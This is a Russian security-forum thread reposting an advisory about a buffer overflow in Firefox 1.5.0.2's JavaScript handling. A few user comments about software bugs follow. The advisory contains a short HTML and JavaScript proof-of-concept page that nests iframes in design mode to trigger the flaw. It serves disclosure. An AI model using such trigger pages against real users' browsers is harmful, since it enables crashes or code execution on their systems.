-
Переполнение буфера в Mozilla Firefox
Переполнение буфера в Mozilla Firefox
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.
Опасность: Критическая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.
Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:
Код:
<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>
URL производителя: mozilla.com
Решение: Способов устранения уязвимости не существует в настоящее время.
* Firefox Remote Code Execution and DoS 1.5.0.2
Источник: securitylab.ru
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Junior Member
- Вес репутации
- 72
Чет совсем кисло товарисчи...только вышла,а тут столько дыр...
I live to serve,and serve to live.
-
Софта без дыр не бывает принципиально. Об этом не стоит забывать. Софт пишут люди, людям свойственно ошибаться.
Left home for a few days and look what happens...
-
-
Junior Member
- Вес репутации
- 67
в чем отличие хорошего сфота от плохого? дыр бывает много или мало
-
Сообщение от
Sunix
в чем отличие хорошего сфота от плохого? дыр бывает много или мало
Еще хороший софт быстро обновляется, засекаем...